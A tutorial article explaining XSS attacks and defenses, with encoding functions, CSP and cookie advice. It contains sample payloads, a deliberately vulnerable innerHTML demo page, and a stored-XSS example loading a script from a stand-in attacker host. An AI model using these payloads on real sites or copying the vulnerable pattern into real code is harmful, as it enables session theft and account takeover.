Detailed Explanation of XSS Cross-Site Scripting Attacks (Including Attack Methods and Defense Techniques)

Time: 2024-09-29  Column: Security  Views: 900

Cross-Site Scripting (XSS) is a prevalent security vulnerability that can compromise web applications, allowing attackers to inject malicious scripts. Understanding XSS is crucial for safeguarding sensitive data and maintaining user trust in online platforms.

1. Overview of XSS

Cross-Site Scripting would naturally be abbreviated as CSS, but that abbreviation is already used for Cascading Style Sheets. To avoid confusion, Cross-Site Scripting is abbreviated as XSS.

XSS (Cross-Site Scripting) is a security vulnerability attack on web applications. XSS attacks typically exploit vulnerabilities left in the development of web pages to inject malicious code into the page, causing users to load and execute malicious scripts created by attackers.

These malicious scripts are usually written in JavaScript but can also include Java, VBScript, ActiveX, Flash, or even plain HTML. Once the attack succeeds, attackers can gain higher privileges (e.g., the ability to perform certain actions) and access sensitive web content, session data, and cookies.

Cross-Site Scripting (XSS) is one of the most common web application security vulnerabilities. These vulnerabilities allow attackers to embed malicious script code into pages that regular users will access. When users visit the page, the malicious script is executed, leading to an attack on the user.

Attackers can execute pre-defined malicious scripts in the user’s browser, which can result in serious consequences such as session hijacking, inserting malicious content, redirecting users, using malware to hijack the user's browser, spreading XSS worms, or even damaging websites and altering router settings.

XSS vulnerabilities date back to the 1990s. Many websites, including Twitter, Facebook, MySpace, Orkut, Sina Weibo, and Baidu Tieba, have been either attacked or found to have XSS vulnerabilities. Studies show that in recent years, XSS attacks have surpassed buffer overflows as the most common attack method, with 68% of websites potentially vulnerable. According to statistics from the Open Web Application Security Project (OWASP) in 2010, XSS ranked second among the top 10 web security threats, just behind injection attacks.

XSS attacks have two main components:

The attacker submits malicious code.
The browser executes the malicious code.

The key point of XSS is not cross-site functionality but the script-based attack.

2. Principles

HTML is a markup language that treats certain characters in a special way to distinguish between text and markup. For example, the less-than sign (<) is considered the start of an HTML tag, and the characters inside the tag may represent a page title or other content.

When content with special characters (such as <) is inserted into a dynamic page, the user's browser may mistakenly interpret it as HTML tags. If these HTML tags include a JavaScript script, the script will be executed in the user's browser. Therefore, if dynamic pages do not properly check or sanitize special characters, XSS vulnerabilities can arise.
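The effect described above can be reproduced with plain string concatenation. The following is a minimal sketch, not taken from any real application: `renderGreeting` and `escapeHtml` are hypothetical helper names, and the payload is a harmless illustration.

```javascript
// Hypothetical page template that concatenates untrusted input into HTML.
function renderGreeting(name) {
  return '<p>Hello, ' + name + '!</p>';
}

// Minimal escaping helper (assumed for illustration): replaces the characters
// that HTML treats as markup with entities so they are displayed as text.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

const payload = '<script>alert(1)</script>';

// Unsafe: a browser would parse the input as a real <script> element.
const unsafeHtml = renderGreeting(payload);

// Safer: the same input is rendered as visible text.
const safeHtml = renderGreeting(escapeHtml(payload));

console.log(unsafeHtml); // <p>Hello, <script>alert(1)</script>!</p>
console.log(safeHtml);   // <p>Hello, &lt;script&gt;alert(1)&lt;/script&gt;!</p>
```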

3. Characteristics

XSS attacks have the following characteristics: strong concealment and ease of initiation.

Compared to phishing attacks, XSS attacks cause more severe harm, with the following traits:

XSS attacks are executed within the application the user is currently using, meaning users will see personalized information, such as account details or "Welcome Back" messages, which cloned websites cannot display.
Phishing websites used in attacks are often quickly shut down once discovered.
Many browsers and security software products include built-in phishing filters to block access to malicious cloned sites.
If a user falls victim to a cloned web banking site, the bank usually bears no responsibility. However, if a user is attacked through an XSS vulnerability in a banking application, the bank cannot easily avoid responsibility.

4. Types

Based on how the attack code operates, XSS can be divided into three types:

Persistent (stored) XSS: The most direct and harmful type, where the attack code is stored on the server (e.g., in a database).
Non-persistent (reflected) XSS: The most common type, where the user sends a request to the server and the server reflects the attack code back to the user's browser. This type does not involve the database.
DOM-based XSS: This type results from client-side script processing logic flaws. The malicious script is executed by manipulating the Document Object Model (DOM) of the page locally.

4.1 Non-persistent XSS

Non-persistent XSS, also known as reflected XSS, is a simple form of attack in which user input is reflected back to the user's browser. To exploit this vulnerability, an attacker must trick the user into visiting a carefully crafted URL (malicious link).

Reflected XSS commonly occurs in features such as search. The attack is triggered only when the user clicks the crafted link. It is generally considered less harmful than persistent XSS, partly because it can be blocked by defenses such as the NoScript extension or, historically, Chrome's built-in XSS Auditor (removed in Chrome 78).

Attack Process:

The attacker tricks the user into clicking a malicious link.
The user input or some user-controlled parameter is not properly sanitized before being output to the page, leading to the vulnerability.
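The two steps above can be sketched as follows. This is a simplified illustration under stated assumptions: the host `shop.example`, the `q` parameter, and the `renderSearchPage` handler are all hypothetical, and no real server is involved.

```javascript
// Step 1: the attacker builds a link whose query parameter carries markup.
const maliciousLink = new URL('https://shop.example/search');
maliciousLink.searchParams.set('q', '<img src=x onerror=alert(1)>');

// Step 2: a hypothetical handler echoes the parameter into the response
// without encoding it, so the markup is reflected back to the victim.
function renderSearchPage(requestUrl) {
  const query = new URL(requestUrl).searchParams.get('q') || '';
  return '<h1>Results for ' + query + '</h1>';
}

const response = renderSearchPage(maliciousLink.href);

console.log(maliciousLink.href); // the percent-encoded link sent to the victim
console.log(response);           // <h1>Results for <img src=x onerror=alert(1)></h1>
```

The link itself contains only percent-encoded characters, which is why it can look harmless to the victim; the markup reappears once the server decodes the parameter and writes it into the page.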

Vulnerability Causes:

Inserting untrusted data into HTML tags (e.g., div, p, td).
Inserting untrusted data into HTML attributes (e.g., <div width=$INPUT></div>).
Inserting untrusted data into JavaScript code (e.g., <script>var message = "$INPUT";</script>).
Inserting untrusted data into style attributes.
Inserting untrusted data into HTML URLs (e.g., <a href="http://www.abcd.com?param=$INPUT"></a>).

If proper prevention measures are not implemented on the server or client side, these scenarios can lead to XSS vulnerabilities.

4.2 Persistent Cross-Site Scripting (XSS)

Stored (or HTML Injection/Persistent) XSS attacks are most common on community-driven websites or webmail sites and do not require special links to execute. Hackers simply need to submit the XSS exploit code (unlike reflected XSS, which is usually embedded in the URL) to a location on a website that other users may access. These areas could include blog comments, user reviews, message boards, chat rooms, HTML emails, wikis, and many other places.

Once a user opens the infected page, the stored script executes automatically; no crafted link is needed.

Vulnerability Cause: The cause of a stored XSS vulnerability is similar to that of reflected XSS. However, in this case, the malicious code is stored on the server, leading to its execution when other users (front-end) or administrators (front and back-end) access the resource. The user accesses the server, the cross-site link is returned, and the malicious code is executed.
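As a rough sketch of the stored case, the example below uses an in-memory array as a stand-in for the server's database. The names `comments`, `saveComment`, `renderCommentsUnsafe`, `renderCommentsSafe`, and `escapeHtml`, as well as the `evil.example` host, are assumptions made for illustration only.

```javascript
// Hypothetical in-memory stand-in for a database table of comments.
const comments = [];

// The submission is stored exactly as received.
function saveComment(author, text) {
  comments.push({ author, text });
}

// Assumed encoder for HTML text content.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable rendering: stored text is written into the page verbatim,
// so every visitor who loads the page receives the attacker's markup.
function renderCommentsUnsafe() {
  return comments
    .map((c) => '<li>' + c.author + ': ' + c.text + '</li>')
    .join('');
}

// Safer rendering: encode each stored value at output time.
function renderCommentsSafe() {
  return comments
    .map((c) => '<li>' + escapeHtml(c.author) + ': ' + escapeHtml(c.text) + '</li>')
    .join('');
}

saveComment('mallory', '<script src="https://evil.example/x.js"></script>');

console.log(renderCommentsUnsafe());
console.log(renderCommentsSafe());
```

Encoding at output time rather than at storage time keeps the stored data intact and lets each output context apply its own encoding.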

4.3 DOM-based Cross-Site Scripting (DOM XSS)

DOM-based XSS refers to an XSS attack that occurs by modifying the page's DOM (Document Object Model).

Attack Example: In the following code, the submit button's onclick event calls the xsstest() function. In xsstest(), the DOM node of the page is modified, writing user input as HTML to the page via innerHTML, which results in a DOM-based XSS attack.

<html>
    <head>
        <title>DOM Based XSS Demo</title>
        <script>
        function xsstest() {
            var str = document.getElementById("input").value;
            // Vulnerable: the input is concatenated into markup and parsed as HTML.
            document.getElementById("output").innerHTML = "<img src='" + str + "'>";
        }
        </script>
    </head>
    <body>
    <div id="output"></div>
    <input type="text" id="input" size=50 value="" />
    <input type="button" value="submit" onclick="xsstest()" />
    </body>
</html>

Vulnerability Cause: DOM-based XSS is rooted in the DOM (Document Object Model) structure of the browser. With the standardization of this technology, JavaScript can easily access the DOM. When a DOM-based XSS vulnerability is identified in client-side code, a user can be tricked (phished) into accessing a specially crafted URL. The exploitation steps are similar to those of reflected XSS, but the key difference is that the payload need not be sent to the server (for example, when it is placed in the URL fragment after #), which allows the attack to bypass Web Application Firewalls (WAFs) and evade server-side detection.
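One possible way to harden the demo above is to avoid innerHTML entirely and to accept only http(s) image URLs. The sketch below is an assumption-laden illustration, not the original author's fix: `toSafeImageUrl` and `showImage` are hypothetical names, and `doc` is expected to be the page's `document` object.

```javascript
// Returns a normalized http(s) URL string, or null if the input is not
// an absolute http(s) URL.
function toSafeImageUrl(input) {
  let url;
  try {
    url = new URL(input);
  } catch (err) {
    return null; // not a parseable absolute URL
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

// Possible replacement for xsstest(): the <img> is built through DOM APIs,
// so the input is never parsed as HTML.
function showImage(doc, input) {
  const src = toSafeImageUrl(input);
  if (src === null) {
    return false; // reject anything that is not an http(s) URL
  }
  const img = doc.createElement('img');
  img.src = src;
  doc.getElementById('output').replaceChildren(img);
  return true;
}

console.log(toSafeImageUrl("x' onerror='alert(1)"));      // null
console.log(toSafeImageUrl('javascript:alert(1)'));       // null
console.log(toSafeImageUrl('https://example.com/a.png')); // https://example.com/a.png
```

In the page, the button handler could then call `showImage(document, document.getElementById('input').value)`.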

5. Attack Methods

Common XSS attack techniques and objectives include:

Stealing cookies to obtain sensitive information.
Using embedded Flash to gain higher permissions through cross-domain settings or similar operations using Java.
Executing administrative actions (or common actions like posting on social media, adding friends, or sending private messages) on behalf of the (attacked) user by leveraging iframes, frames, XMLHttpRequests, or Flash.
Requesting unauthorized actions in a trusted domain using the trust between domains, such as rigging votes in a voting activity.
Using XSS on high-traffic pages to attack smaller websites, potentially leading to a DDoS attack.

6. Defense Methods

6.1 Signature-Based Defense

XSS vulnerabilities, much like the well-known SQL injection vulnerability, exploit flaws in how a web page is coded. Because each vulnerability targets a different weakness, it is difficult to defend against XSS with a single signature.

Traditional XSS defenses typically rely on signature matching, where the keyword "javascript" is checked in submitted data. However, this approach lacks flexibility. Any submission containing "javascript" might be falsely flagged as an XSS attack.
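The weakness of keyword matching can be shown with a toy check. The function `looksLikeXss` below is a hypothetical stand-in for such a signature, not the rule set of any real product.

```javascript
// Naive signature check in the spirit of the keyword matching described above.
function looksLikeXss(input) {
  return /javascript/i.test(input);
}

const samples = [
  'Where can I find a good JavaScript tutorial?', // harmless text
  '<img src=x onerror=alert(1)>',                 // script via an event handler
];

for (const sample of samples) {
  console.log(looksLikeXss(sample), sample);
}
// true  Where can I find a good JavaScript tutorial?   (false positive)
// false <img src=x onerror=alert(1)>                   (missed attack)
```

The harmless sentence is flagged while the payload, which never contains the keyword, passes through.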

6.2 Code-Based Defense

Web developers often make errors that result in vulnerabilities. XSS attacks take advantage of these, so a more effective approach is to improve web application development to reduce vulnerabilities and avoid attacks:

Filter user-submitted data by validating URL formats, HTTP headers, and POST data, ensuring the content follows specific formats and lengths.
Implement session tokens, CAPTCHA systems, or HTTP Referer header checks to prevent functionality from being executed by third-party websites.
Ensure received content is properly sanitized, allowing only minimal, secure tags (excluding JavaScript), removing any external content references (especially stylesheets and JavaScript), and using HTTP-only cookies.

While such practices reduce the usability of web systems, they enforce stricter interaction constraints, suitable primarily for content publishing sites. However, since most web developers lack formal security training, completely avoiding XSS vulnerabilities can be challenging.

6.2.1 XSS Defense via HTML Encoding

Scope: Use HTML encoding when inserting untrusted data into HTML tags (e.g., div, span).

Encoding Rules: Escape characters &, <, >, ", ', / as HTML entities (or decimal/hexadecimal).

Example Code:

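// Encode untrusted data for insertion into HTML element content.
function encodeForHTML(str) {
    return ('' + str)
        .replace(/&/g, '&amp;')    // must run first so later entities are not double-encoded
        .replace(/</g, '&lt;')     // DEC => &#60;  HEX => &#x3C;  Entity => &lt;
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#x27;')   // &apos; is not recommended: it is not defined in HTML 4
        .replace(/\//g, '&#x2F;');
}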

HTML offers three encoding formats: decimal, hexadecimal, and named entities. For example, the less-than sign (<) can be encoded as decimal &#60;, hexadecimal &#x3C;, or named entity &lt;. For single quotes ('), hexadecimal encoding (&#x27;) is preferred because the named entity &apos; was not part of the HTML 4 specification.

6.2.2 XSS Defense via HTML Attribute Encoding

Scope: Apply HTML attribute encoding when inserting untrusted data into HTML attributes (excluding src, href, style, and event handlers).

Encoding Rules: Escape all characters with an ASCII value below 256 (except alphanumeric characters) using &#xHH; or an available named entity.

Example Code:

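// Encode untrusted data for insertion into a quoted HTML attribute value.
function encodeForHTMLAttribute(str) {
    let encoded = '';
    for (let i = 0; i < str.length; i++) {
        const ch = str[i];
        const code = str.charCodeAt(i);
        // Escape every non-alphanumeric character with a code below 256 as &#xHH;
        if (!/[A-Za-z0-9]/.test(ch) && code < 256) {
            encoded += '&#x' + code.toString(16) + ';';
        } else {
            encoded += ch;
        }
    }
    return encoded;
}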

6.2.3 XSS Defense through JavaScript Encoding

Scope: JavaScript encoding is applied when inserting untrusted data into event handler attributes or JavaScript values.

Encoding Rules: Use the \xHH format to escape all characters with character codes below 256, except for alphanumeric characters.

Example Code:

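// Encode untrusted data for insertion into a quoted JavaScript string literal.
function encodeForJavascript(str) {
    let encoded = '';
    for (let i = 0; i < str.length; i++) {
        const ch = str[i];
        const code = str.charCodeAt(i);
        // Escape every non-alphanumeric character with a code below 256 as \xHH.
        // \x requires exactly two hex digits, so pad values below 0x10.
        if (!/[A-Za-z0-9]/.test(ch) && code < 256) {
            encoded += '\\x' + code.toString(16).padStart(2, '0');
        } else {
            encoded += ch;
        }
    }
    return encoded;
}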

6.2.4 XSS Defense through URL Encoding

Scope: When untrusted data is used as URL parameter values, URL encoding should be applied.

Encoding Rules: Apply encodeURIComponent to encode the parameter values.

Example Code:

function encodeForURL(str, kwargs){     
    return encodeURIComponent(str);   
};
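As a usage sketch, the snippet below places an untrusted value into the query string of a fixed link. The helper name `buildSearchLink` and the `www.example.com` endpoint are assumptions for illustration.

```javascript
// Hypothetical helper: the base URL is fixed and trusted; only the
// parameter value comes from untrusted input.
function buildSearchLink(term) {
  return 'https://www.example.com/search?q=' + encodeURIComponent(term);
}

console.log(buildSearchLink('"><script>alert(1)</script>'));
// https://www.example.com/search?q=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E

// encodeURIComponent leaves a few characters untouched, including the
// single quote, so the resulting URL should go into a double-quoted attribute.
console.log(encodeURIComponent("it's")); // it's
```

This only covers parameter values. When the whole URL is attacker-controlled, encoding the value is not enough, and the scheme would also need to be checked.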

6.2.5 XSS Defense through CSS Encoding

Scope: CSS encoding is applied when untrusted data is used within CSS.

Encoding Rules: Use the \XXXXXX format (a backslash followed by six hexadecimal digits) to escape all characters with character codes below 256, except for alphanumeric characters.

Example Code:

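// Encode untrusted data for insertion into a CSS value.
// Note: attr is kept from the original signature but is not used.
function encodeForCSS(attr, str) {
    let encoded = '';
    for (let i = 0; i < str.length; i++) {
        const ch = str.charAt(i);
        if (!/[a-zA-Z0-9]/.test(ch)) {
            // Escape as a backslash followed by six hex digits, e.g. \00003c for "<"
            const hex = str.charCodeAt(i).toString(16);
            encoded += '\\' + hex.padStart(6, '0');
        } else {
            encoded += ch;
        }
    }
    return encoded;
}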

User input should always be treated as untrusted. HTTP parameters should be validated; for example, an enum-type field should reject any value outside the enum. Any output that includes untrusted data should be encoded for the context in which it appears.
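The enum rule can be sketched as an allowlist check. The parameter names `sort` and `q`, the allowed values, and the length limit below are all hypothetical choices for illustration.

```javascript
// Assumed allowlist for an enum-type parameter.
const ALLOWED_SORT = new Set(['newest', 'oldest', 'popular']);
// Assumed upper bound for a free-text parameter.
const MAX_QUERY_LENGTH = 100;

// Returns a list of validation errors; an empty list means the input passed.
function validateSearchParams(params) {
  const errors = [];
  if (!ALLOWED_SORT.has(params.sort)) {
    errors.push('sort must be one of: newest, oldest, popular');
  }
  if (typeof params.q !== 'string' || params.q.length === 0 || params.q.length > MAX_QUERY_LENGTH) {
    errors.push('q must be a non-empty string of at most ' + MAX_QUERY_LENGTH + ' characters');
  }
  return errors;
}

console.log(validateSearchParams({ sort: 'newest', q: 'xss' }));            // []
console.log(validateSearchParams({ sort: '<script>', q: 'xss' }).length);   // 1
```

Validation of this kind narrows what can reach the page, but the free-text field still needs output encoding, since valid text can contain markup characters.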

XSS vulnerabilities can be difficult to detect, but frameworks like React and Vue now incorporate XSS defense mechanisms at the framework level, which alleviates some of the burden. However, developers must still be familiar with the basics of XSS to avoid creating vulnerabilities in the first place. Frameworks are tools, but proper development practices and heightened security awareness are essential to keeping web front-ends secure.

6.3 Client-Side Layered Defense Strategy

The client-side cross-site scripting (XSS) layered defense strategy is based on a security model that allocates independent threads and implements layered defense strategies. This model is primarily implemented on the client side (browser), which distinguishes it from other models. Client-side security is crucial as it determines which server information to execute, making XSS defense easier. The model consists of three main components:

A “webpage thread analysis module” that allocates an independent thread for each webpage and analyzes resource consumption.
A user input analysis module containing four rules of the layered defense strategy.
An XSS information database that stores data about malicious XSS websites on the internet.

XSS attacks often arise due to program vulnerabilities, and the complete prevention of XSS vulnerabilities relies heavily on the programmer's skill and security awareness. However, following secure software development processes and certain programming principles can greatly reduce the occurrence of XSS vulnerabilities. These principles include:

Do not trust any user-submitted content. All user-submitted data should be subject to reliable input validation, including URLs, query keywords, HTTP headers, the Referer header, and POST data. Only accept content that falls within the expected length, format, and character set. Use POST over GET for form submissions whenever possible, and filter characters like <, >, ;, and " from the input. Any content output to the page should be encoded to avoid unintentionally rendering HTML tags.
Implement session tokens, CAPTCHA systems, or HTTP Referer header checks to prevent third-party websites from executing functions. For user-submitted elements like images or links, check for suspicious behavior such as redirection back to the site or non-image URLs.
Prevent cookie theft. Avoid exposing sensitive information such as email addresses or passwords directly in cookies. Bind cookies to the client's IP address so that a cookie stolen by an attacker cannot easily be replayed from another machine.
Ensure that received content is properly sanitized and only includes minimal and secure tags (excluding JavaScript). Remove any references to remote content (especially stylesheets and JavaScript) and use HTTP-only cookies.

6.4 Other Types of XSS Prevention

While careful escaping when rendering pages and executing JavaScript can prevent XSS, solely relying on strict development practices is insufficient. Below are some general strategies that can help mitigate the risks and impacts of XSS:

CSP: Content Security Policy
A strict Content Security Policy (CSP) can help in XSS prevention by:

Prohibiting the loading of external scripts, thus preventing complex attack logic.
Blocking external submissions, ensuring that user data won't be leaked to external domains even if the site is compromised.
Disabling inline script execution (this is strict; GitHub is an example of a site that employs this rule).
Blocking unauthorized script execution (this is a new feature, used in Google Maps mobile).
Properly configuring CSP reporting allows for timely detection of XSS attempts and swift remediation.
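A policy along these lines might be assembled as shown below. This is a sketch under assumptions: `buildCspHeader` is a hypothetical helper, the `/csp-report` endpoint is made up, and the directive values would need to be adapted to the resources a real site loads.

```javascript
// Joins a map of directive names to value lists into a header value.
function buildCspHeader(directives) {
  return Object.entries(directives)
    .map(([name, values]) => name + ' ' + values.join(' '))
    .join('; ');
}

const csp = buildCspHeader({
  'default-src': ["'self'"],    // load resources only from the site's own origin
  'script-src': ["'self'"],     // no external scripts; inline scripts are blocked
  'object-src': ["'none'"],     // no plugins
  'form-action': ["'self'"],    // forms may only submit to the same origin
  'report-uri': ['/csp-report'] // hypothetical endpoint that collects violation reports
});

console.log('Content-Security-Policy: ' + csp);
// Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; form-action 'self'; report-uri /csp-report
```

Because `script-src` omits `'unsafe-inline'`, inline script blocks and inline event handlers are refused, which corresponds to the strict rule mentioned in the list above.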

Input Length Restrictions
Enforce a reasonable length limit on all untrusted input. While this won't prevent XSS entirely, it can make exploitation more difficult.

Other Security Measures

HTTP-only cookies: These prevent JavaScript from accessing sensitive cookies, so attackers cannot steal them even after successfully injecting XSS.
CAPTCHA: Helps prevent scripts from submitting dangerous actions on behalf of users.
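For the HTTP-only cookie measure, the header a server sends might look like the output of the sketch below. The helper name `buildSessionCookie` and the cookie name `sid` are hypothetical; the `Secure` and `SameSite` attributes are additions beyond what the text above describes and are included only as commonly paired settings.

```javascript
// Builds a Set-Cookie header value for a session cookie.
function buildSessionCookie(name, value) {
  return [
    name + '=' + encodeURIComponent(value),
    'Path=/',
    'HttpOnly',     // hides the cookie from document.cookie in page scripts
    'Secure',       // assumption: send only over HTTPS
    'SameSite=Lax', // assumption: limit cross-site sending
  ].join('; ');
}

console.log('Set-Cookie: ' + buildSessionCookie('sid', 'abc123'));
// Set-Cookie: sid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax
```

An injected script can still act on the user's behalf within the page, so this measure limits cookie theft rather than XSS itself.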
